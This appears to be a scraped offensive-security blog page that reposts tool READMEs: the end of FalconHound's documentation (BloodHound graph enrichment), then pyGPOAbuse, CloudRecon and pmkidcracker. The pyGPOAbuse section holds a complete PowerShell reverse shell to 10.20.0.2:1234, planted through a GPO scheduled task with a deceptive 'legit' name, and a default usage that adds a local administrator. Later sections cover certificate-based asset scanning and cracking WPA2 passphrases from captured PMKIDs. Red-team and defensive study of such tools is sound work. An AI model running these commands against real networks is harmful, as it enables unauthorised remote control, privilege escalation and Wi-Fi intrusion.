This will make the processing of the results faster and more efficient.</p> <p dir="auto">Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:</p> <div><pre><code>MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription) <br /> RETURN {Name:g.name , Count:COUNT(g.name), Role:type(r), Owners:COLLECT(n.name)}</code></pre></div> <h4 dir="auto" tabindex="-1">Targets</h4> <p dir="auto">Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the <code>Name</code> and <code>Enabled</code> fields. The <code>Name</code> field is used to identify the target. The <code>Enabled</code> field is used to enable or disable the target. If this is set to false, the target will be ignored.</p> <h4 dir="auto" tabindex="-1">CSV</h4> <div class="highlight highlight-source-yaml notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content=" - Name: CSV Enabled: true Path: path/to/filename.csv" dir="auto"><pre><code> - Name: CSV<br /> Enabled: true<br /> Path: path/to/filename.csv</code></pre></div> <h4 dir="auto" tabindex="-1">Neo4j</h4> <p dir="auto">The Neo4j target will write the results of the query to a Neo4j database. This output is per line and therefore it requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. 
The <code>ReplacementFields</code> fields are configured below.</p> <div class="highlight highlight-source-yaml notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content=" - Name: Neo4j Enabled: true Query: | MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound' Parameters: Computer: Computer TargetUserSid: TargetUserSid Timestamp: Timestamp" dir="auto"><pre><code> - Name: Neo4j<br /> Enabled: true<br /> Query: |<br /> MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound'<br /> Parameters:<br /> Computer: Computer<br /> TargetUserSid: TargetUserSid<br /> Timestamp: Timestamp</code></pre></div> <p dir="auto">The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the <code>$parameter_name</code> syntax.</p> <h4 dir="auto" tabindex="-1">Sentinel</h4> <p dir="auto">The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.</p> <p dir="auto">This is also why query output needs to be controlled; you might otherwise flood your target.</p> <div class="highlight highlight-source-yaml notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content=" - Name: Sentinel Enabled: true" dir="auto"><pre><code> - Name: Sentinel<br /> Enabled: true</code></pre></div> <h4 dir="auto" tabindex="-1">Sentinel Watchlists</h4> <p dir="auto">The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. 
The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.</p> <div class="highlight highlight-source-yaml notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content=" - Name: Watchlist Enabled: true WatchlistName: FH_MDE_Exploitable_Machines DisplayName: MDE Exploitable Machines SearchKey: DeviceName Overwrite: true" dir="auto"><pre><code> - Name: Watchlist<br /> Enabled: true<br /> WatchlistName: FH_MDE_Exploitable_Machines<br /> DisplayName: MDE Exploitable Machines<br /> SearchKey: DeviceName<br /> Overwrite: true</code></pre></div> <p dir="auto">The <code>WatchlistName</code> field is the name of the watchlist. The <code>DisplayName</code> field is the display name of the watchlist.</p> <p dir="auto">The <code>SearchKey</code> field is the column that will be used as the search key.</p> <p dir="auto">The <code>Overwrite</code> field determines whether the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.</p> <h4 dir="auto" tabindex="-1">Splunk</h4> <p dir="auto">Like the Sentinel target, the Splunk target will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.</p> <div class="highlight highlight-source-yaml notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content=" - Name: Splunk Enabled: true" dir="auto"><pre><code> - Name: Splunk<br /> Enabled: true</code></pre></div> <h4 dir="auto" tabindex="-1">Azure Data Explorer</h4> <p dir="auto">Like the Sentinel and Splunk targets, the ADX target will write the results of the query to an ADX table. 
The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.</p> <div class="highlight highlight-source-yaml notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content=" - Name: ADX Enabled: true Table: &quot;name&quot;" dir="auto"><pre><code> - Name: ADX<br /> Enabled: true<br /> Table: "name"</code></pre></div> <h3 dir="auto" tabindex="-1">Extensions to the graph</h3> <h4 dir="auto" tabindex="-1">Relationship: HadSession</h4> <p dir="auto">Once a session has ended, it would have to be removed from the graph, but this felt like a waste of information. So instead of removing the session, it is added as a relationship between the computer and the user. The relationship is called <code>HadSession</code> and has the following properties:</p> <div class="highlight highlight-source-json notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="{ &quot;till&quot;: &quot;2021-08-31T14:00:00Z&quot;, &quot;source&quot;: &quot;falconhound&quot;, &quot;reason&quot;: &quot;logoff&quot; }" dir="auto"><pre><code>{<br /> "till": "2021-08-31T14:00:00Z",<br /> "source": "falconhound",<br /> "reason": "logoff"<br />}</code></pre></div> <p dir="auto">This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.</p> <h4 dir="auto" tabindex="-1">Properties</h4> <p dir="auto">FalconHound will add the following properties to nodes in the graph:</p> <p dir="auto">Computer:</p> <ul dir="auto"> <li><code>exploitable</code>: true/false</li> <li><code>exploits</code>: list of CVEs</li> <li><code>exposed</code>: true/false</li> <li><code>ports</code>: list of ports accessible from the internet</li> <li><code>alertids</code>: list of alert ids</li> </ul> <h2 dir="auto" tabindex="-1">Credential management</h2> <p dir="auto">The currently supported ways of providing FalconHound with credentials are:</p> <ul dir="auto"> <li>Via the config.yml file on disk.</li> <li>Keyvault secrets. 
This still requires a ServicePrincipal with secrets in the yaml.</li> <li>Mixed mode.</li> </ul> <h4 dir="auto" tabindex="-1">Config.yml</h4> <p dir="auto">The config file holds all details required by each platform. All items in the config file are <strong>case-sensitive</strong>. Best practice is to separate the apps on a per-service level, but you <em>can</em> use one AppID/AppSecret for all Azure-based actions.</p> <p dir="auto">The required permissions for your AppID/AppSecret are listed <a href="https://github.com/FalconForceTeam/FalconHound/blob/main/docs/required_permissions.md" rel="nofollow" target="_blank" title="here">here</a>.</p> <h4 dir="auto" tabindex="-1">Keyvault</h4> <p dir="auto">A more secure way of storing the credentials is to use an Azure KeyVault. Be aware that there is a small <a href="https://azure.microsoft.com/en-us/pricing/details/key-vault/" rel="nofollow" target="_blank" title="cost aspect">cost aspect</a> to using Keyvaults. Access to KeyVaults currently only supports authentication based on an AppID/AppSecret, which needs to be configured in the config.yml file.</p> <p dir="auto">The recommended way to set this up is to use a ServicePrincipal that only has the <code>Key Vault Secrets User</code> role for this Keyvault. This role only allows reading the secrets, not even listing them. Do <em>NOT</em> reuse the ServicePrincipal which has access to Sentinel and/or MDE, since this almost completely negates the use of a Keyvault.</p> <p dir="auto">The items to configure in the Keyvault are listed below. 
Please note Keyvault secrets are <strong>not</strong> case-sensitive.</p> <div><pre><code>SentinelAppSecret<br />SentinelAppID<br />SentinelTenantID<br />SentinelTargetTable<br />SentinelResourceGroup<br />SentinelSharedKey<br />SentinelSubscriptionID<br />SentinelWorkspaceID<br />SentinelWorkspaceName<br />MDETenantID<br />MDEAppID<br />MDEAppSecret<br />Neo4jUri<br />Neo4jUsername<br />Neo4jPassword<br />GraphTenantID<br />GraphAppID<br />GraphAppSecret<br />AdxTenantID<br />AdxAppID<br />AdxAppSecret<br />AdxClusterURL<br />AdxDatabase<br />SplunkUrl<br />SplunkApiToken<br />SplunkIndex<br />SplunkApiPort<br />SplunkHecToken<br />SplunkHecPort<br />BHUrl<br />BHTokenID<br />BHTokenKey<br />LogScaleUrl<br />LogScaleToken<br />LogScaleRepository<br /></code></pre></div> <p dir="auto">Once configured you can add the <code>-keyvault</code> parameter while starting FalconHound.</p> <h4 dir="auto" tabindex="-1">Mixed mode / fallback</h4> <p dir="auto">When the <code>-keyvault</code> parameter is set on the command-line, this will be the primary source for all required secrets. Should FalconHound fail to retrieve items, it will fall back to the equivalent item in the <code>config.yml</code>. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.</p> <h2 dir="auto" tabindex="-1">Deployment</h2> <p dir="auto">FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the amount of actions you have enabled, the amount of data you are processing and the amount of data you are writing to the graph, this can take a while.</p> <p dir="auto">All log based queries are built to run every 15 minutes. Should processing take too long you might need to tweak this a little. 
If this is the case, it might be worth disabling certain actions.</p> <p dir="auto">There might also be some overlap with, for instance, the session actions. If you have a lot of sessions you might want to disable the session actions for Sentinel and rely on the ones from MDE. This assumes you have MDE and Sentinel connected and most machines are onboarded into MDE.</p> <h3 dir="auto" tabindex="-1">Sharphound / Azurehound</h3> <p dir="auto">While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to complement the collection and remove the moment-in-time problem of the periodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all similar data is available in logs.</p> <p dir="auto">It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day, week or month, and FalconHound every 15 minutes.</p> <h2 dir="auto" tabindex="-1">License</h2> <p dir="auto">This project is licensed under the BSD3 License - see the <a href="https://github.com/FalconForceTeam/FalconHound/blob/main/LICENSE" rel="nofollow" target="_blank" title="LICENSE">LICENSE</a> file for details.</p> <p dir="auto">This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.</p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/FalconForceTeam/FalconHound" rel="nofollow" target="_blank" title="Download FalconHound">Download FalconHound</a></span></b></div></div></article>
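The action-ordering rules from the Actions section — folders processed recursively, YAML files in alphabetical order, with Neo4j actions last so they read what the other sources have just written — can be sketched as a small sort key. This is a hypothetical helper illustrating the documented ordering, not FalconHound's actual Go scheduler.

```python
from pathlib import PurePosixPath

def order_actions(paths):
    """Sort action file paths alphabetically, but push anything under a
    'neo4j' source directory to the end, since those queries depend on the
    other sources having updated the graph first."""
    def sort_key(path):
        parts = [p.lower() for p in PurePosixPath(path).parts]
        runs_last = "neo4j" in parts   # Neo4j actions are processed last
        return (runs_last, path)
    return sorted(paths, key=sort_key)

actions = ["actions/neo4j/paths.yml",
           "actions/mde/alerts.yml",
           "actions/sentinel/sessions.yml"]
print(order_actions(actions))
# ['actions/mde/alerts.yml', 'actions/sentinel/sessions.yml', 'actions/neo4j/paths.yml']
```

Keeping the ordering deterministic like this is what makes it safe to name action files so that dependent queries run after their inputs.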
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-24285818649619463762024-02-18T15:46:00.000-08:002024-02-18T15:46:21.178-08:00pyGPOAbuse - Partial Python Implementation Of SharpGPOAbuse<article><div class="post-body entry-content" id="post-body-3003964975585028415" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiIsxrP6JFy-eHuQ2NmbSK9M3bnxQI6dMOcrZoH2_L4K2iDNMOgg_SYHlUyI3lWB6s92BcqgvSP39sLIOGnTgwzFg1UgFj3M0O9br2z3so_P4KngmioQEURu-nArypXCxa55VOQ--_XR90mrko2FSBnxaQJKfCcS7xHxVgxFgV15GoYdoiqbzaHJ_Ro2r0f"><img alt="" border="0" height="272" id="BLOGGER_PHOTO_ID_7310066697453060050" src="https://blogger.googleusercontent.com/img/a/AVvXsEiIsxrP6JFy-eHuQ2NmbSK9M3bnxQI6dMOcrZoH2_L4K2iDNMOgg_SYHlUyI3lWB6s92BcqgvSP39sLIOGnTgwzFg1UgFj3M0O9br2z3so_P4KngmioQEURu-nArypXCxa55VOQ--_XR90mrko2FSBnxaQJKfCcS7xHxVgxFgV15GoYdoiqbzaHJ_Ro2r0f=w640-h272" width="640" /></a></p><p><br /></p> <p dir="auto">Python <strong>partial</strong> implementation of <a href="https://github.com/FSecureLABS/SharpGPOAbuse" rel="nofollow" target="_blank" title="SharpGPOAbuse">SharpGPOAbuse</a> by<a href="https://twitter.com/pkb1s" rel="nofollow" target="_blank" title="@pkb1s">@pkb1s</a></p> <p dir="auto">This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. 
It will create an <strong>immediate scheduled task</strong> as <strong>SYSTEM</strong> on the remote computer for a computer GPO, or as the logged-in user for a user GPO.</p> <p dir="auto">Default behavior adds a local administrator.</p> <h2 dir="auto" tabindex="-1">How to use</h2> <h3 dir="auto" tabindex="-1">Basic usage</h3> <p dir="auto">Add <strong>john</strong> user to local administrators group (Password: <strong>H4x00r123..</strong>)</p> <div><pre><code>./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"</code></pre></div> <h3 dir="auto" tabindex="-1">Advanced usage</h3> <p dir="auto">Reverse shell example</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ -powershell \ -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ -taskname "Completely Legit Task" \ -description "Dis is legit, pliz no delete" \ -user" dir="auto"><pre><code>./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ <br /> -powershell \ <br /> -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = 
\$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ <br /> -taskname "Completely Legit Task" \<br /> -description "Dis is legit, pliz no delete" \ <br /> -user</code></pre></div> <h2 dir="auto" tabindex="-1">Credits</h2> <ul dir="auto"> <li><a href="https://twitter.com/pkb1s" rel="nofollow" target="_blank" title="@pkb1s">@pkb1s</a> for <a href="https://github.com/FSecureLABS/SharpGPOAbuse" rel="nofollow" target="_blank" title="SharpGPOAbuse">SharpGPOAbuse</a></li> <li><a href="https://twitter.com/airman604" rel="nofollow" target="_blank" title="@airman604">@airman604</a> for <a href="https://github.com/airman604/schtask_now" rel="nofollow" target="_blank" title="schtask_now.py">schtask_now.py</a></li> <li><a href="https://twitter.com/skelsec" rel="nofollow" target="_blank" title="@SkelSec">@SkelSec</a> for <a href="https://github.com/skelsec/msldap" rel="nofollow" target="_blank" title="msldap">msldap</a></li> </ul> <br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Hackndo/pyGPOAbuse" rel="nofollow" target="_blank" title="Download pyGPOAbuse">Download pyGPOAbuse</a></span></b></div></div></article>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-39398472397354876822024-02-18T15:43:00.000-08:002024-02-18T15:43:47.798-08:00CloudRecon - Finding assets from certificates<article><div class="post-body entry-content" id="post-body-879478449228198068" itemprop="articleBody"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKuGMJK0d70mOcmfPRucqUtXe2lmcfR4o-6YeoUQJAFW97-q_FAwoir8Cf_A7gHKxQiUAPq78W94FCtk_QynyNNQbUTTduclLlPnWbi-tTVBs9Hz4M41eH08v6JGW8jKMgocFcbpuqxjCdxIv1vUPKBllGnB0lvb21sE3Yd2nZFnTwhduG0LrwQymamb-X/s1792/CloudRecon.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1792" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKuGMJK0d70mOcmfPRucqUtXe2lmcfR4o-6YeoUQJAFW97-q_FAwoir8Cf_A7gHKxQiUAPq78W94FCtk_QynyNNQbUTTduclLlPnWbi-tTVBs9Hz4M41eH08v6JGW8jKMgocFcbpuqxjCdxIv1vUPKBllGnB0lvb21sE3Yd2nZFnTwhduG0LrwQymamb-X/w640-h366/CloudRecon.png" width="640" /></a></div><p><br /></p><h1 dir="auto" tabindex="-1">CloudRecon</h1> <p dir="auto">Finding assets from certificates! Scan the web! Tool presented @DEFCON 31</p> <h1 dir="auto" tabindex="-1">Install</h1> <p dir="auto"><strong>You must have CGO enabled, and may have to install gcc to run CloudRecon.</strong></p> <div><pre><code>sudo apt install gcc</code></pre></div> <div><pre><code>go install github.com/g0ldencybersec/CloudRecon@latest</code></pre></div> <h1 dir="auto" tabindex="-1">Description</h1> <p dir="auto"><strong>CloudRecon</strong></p> <p dir="auto">CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.</p> <p dir="auto">Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. 
Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all, but many still need HTTPS.</p> <p dir="auto">CloudRecon is a suite of tools to scan IP addresses or CIDRs (ex: cloud providers' IPs) and find these hidden gems for testers, by inspecting those SSL certificates.</p> <p dir="auto">The tool suite is three parts in GO:</p> <p dir="auto">Scrape - A LIVE running tool to inspect the ranges for a keyword in SSL certs' CN and SAN fields in real time.</p> <p dir="auto">Store - a tool to retrieve IPs' certs and download all their Orgs, CNs, and SANs. So you can have your OWN crt.sh database.</p> <p dir="auto">Retr - a tool to parse and search through the downloaded certs for keywords.</p> <h1 dir="auto" tabindex="-1">Usage</h1> <p dir="auto"><strong>MAIN</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="Usage: CloudRecon scrape|store|retr [options] -h Show the program usage message Subcommands: cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file cloudrecon retr - Query local DB file for results" dir="auto"><pre><code>Usage: CloudRecon scrape|store|retr [options]<br /><br /> -h Show the program usage message<br /><br />Subcommands: <br /><br /> cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout<br /> cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file<br /> cloudrecon retr - Query local DB file for results</code></pre></div> <p dir="auto"><strong>SCRAPE</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="scrape [options] -i <IPs/CIDRs or File> -a Add this flag if you want to see all output including failures -c int How many goroutines running concurrently (default 100) -h print usage! 
-i string Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE" ) -p string TLS ports to check for certificates (default "443") -t int Timeout for TLS handshake (default 4)" dir="auto"><pre><code>scrape [options] -i <IPs/CIDRs or File><br /> -a Add this flag if you want to see all output including failures<br /> -c int<br /> How many goroutines running concurrently (default 100)<br /> -h print usage!<br /> -i string<br /> Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE" )<br /> -p string<br /> TLS ports to check for certificates (default "443")<br /> -t int<br /> Timeout for TLS handshake (default 4)</code></pre></div> <p dir="auto"><strong>STORE</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="store [options] -i <IPs/CIDRs or File> -c int How many goroutines running concurrently (default 100) -db string String of the DB you want to connect to and save certs! (default "certificates.db") -h print usage! -i string Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE") -p string TLS ports to check for certificates (default "443") -t int Timeout for TLS handshake (default 4)" dir="auto"><pre><code>store [options] -i <IPs/CIDRs or File><br /> -c int<br /> How many goroutines running concurrently (default 100)<br /> -db string<br /> String of the DB you want to connect to and save certs! 
(default "certificates.db")<br /> -h print usage!<br /> -i string<br /> Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")<br /> -p string<br /> TLS ports to check for certificates (default "443")<br /> -t int<br /> Timeout for TLS handshake (default 4)</code></pre></div> <p dir="auto"><strong>RETR</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="retr [options] -all Return all the rows in the DB -cn string String to search for in common name column, returns like-results (default "NONE") -db string String of the DB you want to connect to and save certs! (default "certificates.db") -h print usage! -ip string String to search for in IP column, returns like-results (default "NONE") -num Return the Number of rows (results) in the DB (By IP) -org string String to search for in Organization column, returns like-results (default "NONE") -san string String to search for in common name column, returns like-results (default "NONE")" dir="auto"><pre><code>retr [options]<br /> -all<br /> Return all the rows in the DB<br /> -cn string<br /> String to search for in common name column, returns like-results (default "NONE")<br /> -db string<br /> String of the DB you want to connect to and save certs! 
(default "certificates.db")<br /> -h print usage!<br /> -ip string<br /> String to search for in IP column, returns like-results (default "NONE")<br /> -num<br /> Return the Number of rows (results) in the DB (By IP)<br /> -org string<br /> String to search for in Organization column, returns like-results (default "NONE")<br /> -san string<br /> String to search for in common name column, returns like-results (default "NONE")</code></pre></div> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/g0ldencybersec/CloudRecon" rel="nofollow" target="_blank" title="Download CloudRecon">Download CloudRecon</a></span></b></div>
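<p dir="auto">The core trick behind <code>scrape</code> — complete a TLS handshake and read the certificate's Org, CN, and SAN fields — can be sketched in a few lines of Python. Names and flow here are illustrative, not CloudRecon's actual Go code:</p>

```python
import socket
import ssl

def extract_names(cert: dict):
    """Pull the Org, CN, and DNS SANs out of a getpeercert()-style dict."""
    subject = {k: v for rdn in cert.get("subject", ()) for k, v in rdn}
    sans = [v for kind, v in cert.get("subjectAltName", ()) if kind == "DNS"]
    return subject.get("organizationName"), subject.get("commonName"), sans

def grab_cert(ip: str, port: int = 443, timeout: float = 4.0):
    """Handshake with ip:port and return (org, cn, sans) from the served cert.

    Note: a real scanner would disable verification to accept self-signed and
    mismatched certs and parse the raw DER itself, since Python's
    getpeercert() returns an empty dict once verification is turned off."""
    ctx = ssl.create_default_context()
    with socket.create_connection((ip, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=ip) as tls:
            return extract_names(tls.getpeercert())
```

<p dir="auto">Filtering the returned CN and SANs for a keyword is then all the real-time matching in <code>scrape</code> has to do.</p>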
</div>
</article>
<div class="hreview"><br /></div>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-50071618698303616572024-02-18T15:41:00.000-08:002024-02-18T15:41:27.244-08:00Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication<article><div class="post-body entry-content" id="post-body-1098708597056961998" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhw1b6pfD0Y_aPyFbES7LKYrGQOKTv_Ynhzo9d898_MKuZlOUR_x3t_ixVJ6osromyM_2aZu_Sy1GQjDekPeQLFdRhoLFLytETV6Fw1hY6xOLb-3PwEkSZBbjPtHaeNDNrvyot4RCN9aaP7W7Is4cWy-hAfjXRqfQPbCQI26in2UEpQoof5Sk4OWn44yM6D"><img alt="" border="0" height="462" id="BLOGGER_PHOTO_ID_7310068326057100370" src="https://blogger.googleusercontent.com/img/a/AVvXsEhw1b6pfD0Y_aPyFbES7LKYrGQOKTv_Ynhzo9d898_MKuZlOUR_x3t_ixVJ6osromyM_2aZu_Sy1GQjDekPeQLFdRhoLFLytETV6Fw1hY6xOLb-3PwEkSZBbjPtHaeNDNrvyot4RCN9aaP7W7Is4cWy-hAfjXRqfQPbCQI26in2UEpQoof5Sk4OWn44yM6D=w640-h462" width="640" /></a></p><div><br /></div> <p dir="auto">This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. 
It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.</p> <h2 dir="auto" tabindex="-1">Program Usage</h2> <div><pre><code>python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)><br /></code></pre></div> <p dir="auto"><strong>NOTE:</strong> <em>apmac, clientmac, pmkid must be a hexstring, e.g. b8621f50edd9</em></p> <h2 dir="auto" tabindex="-1">How PMKID is Calculated</h2> <p dir="auto">The two main formulas to obtain a PMKID are as follows:</p> <ol dir="auto"> <li><strong>Pairwise Master Key (PMK) Calculation:</strong> passphrase + salt(ssid) => PBKDF2(HMAC-SHA1) of 4096 iterations</li> <li><strong>PMKID Calculation:</strong> HMAC-SHA1[pmk + ("PMK Name" + bssid + clientmac)]</li> </ol> <p dir="auto">This is just for understanding; both are already implemented in <code>find_pw_chunk</code> and <code>calculate_pmkid</code>.</p> <h2 dir="auto" tabindex="-1">Obtaining the PMKID</h2> <p dir="auto">Below are the steps to obtain the 
PMKID manually by inspecting the packets in Wireshark.</p> <p dir="auto"><em><strong>You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.</strong></em></p> <p dir="auto">To obtain the PMKID manually from Wireshark, put your wireless antenna in monitor mode and start capturing all packets with airodump-ng or similar tools. Then connect to the AP <strong>using an invalid password</strong> to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.</p> <p dir="auto"><strong>Open the pcap in Wireshark:</strong></p> <ul dir="auto"> <li>Filter with <code>wlan_rsna_eapol.keydes.msgnr == 1</code> in Wireshark to display only EAPOL message 1 packets.</li> <li>In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC</li> <li>In EAPOL 1 pkt, Expand 802.1X Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below</li> </ul> <p dir="auto"><strong>If the access point is vulnerable, you should see the PMKID value like the below screenshot:</strong></p> <p dir="auto" style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgnhIy35QKaNmbDTGNg0V4L5m7Ip3J2R87ysRe5-Ppr38CmGV2z9M8xRiAiTM7wLGa_sicIIjPASf8hUs1CHX6EVxwqI7ur1KqfemvQ3oqdQAvqCY_YCIV1DpX-TgsgOSlNa3lBpjPjJfrLZS4vZGe8ZOADGJnSLHq-UIF-5kHAZUIh7NMEbDToW6lY-2wS"><img alt="" border="0" height="386" id="BLOGGER_PHOTO_ID_7310068347436761858" src="https://blogger.googleusercontent.com/img/a/AVvXsEgnhIy35QKaNmbDTGNg0V4L5m7Ip3J2R87ysRe5-Ppr38CmGV2z9M8xRiAiTM7wLGa_sicIIjPASf8hUs1CHX6EVxwqI7ur1KqfemvQ3oqdQAvqCY_YCIV1DpX-TgsgOSlNa3lBpjPjJfrLZS4vZGe8ZOADGJnSLHq-UIF-5kHAZUIh7NMEbDToW6lY-2wS=w640-h386" width="640" /></a></p> 
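<p dir="auto">The two formulas above can be reproduced with Python's standard library alone. This is an illustrative re-implementation for understanding, not the tool's own <code>calculate_pmkid</code>; MAC addresses are passed as hexstrings, matching the tool's arguments:</p>

```python
import hashlib
import hmac

def pmkid_for(passphrase: str, ssid: str, ap_mac: str, client_mac: str) -> str:
    # 1) PMK: PBKDF2-HMAC-SHA1(passphrase, salt=ssid, 4096 iterations, 32 bytes)
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)
    # 2) PMKID: first 128 bits of HMAC-SHA1(PMK, "PMK Name" || AP MAC || client MAC)
    data = b"PMK Name" + bytes.fromhex(ap_mac) + bytes.fromhex(client_mac)
    return hmac.new(pmk, data, hashlib.sha1).hexdigest()[:32]
```

<p dir="auto">Cracking then reduces to computing this for each wordlist candidate and comparing the result against the captured PMKID.</p>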
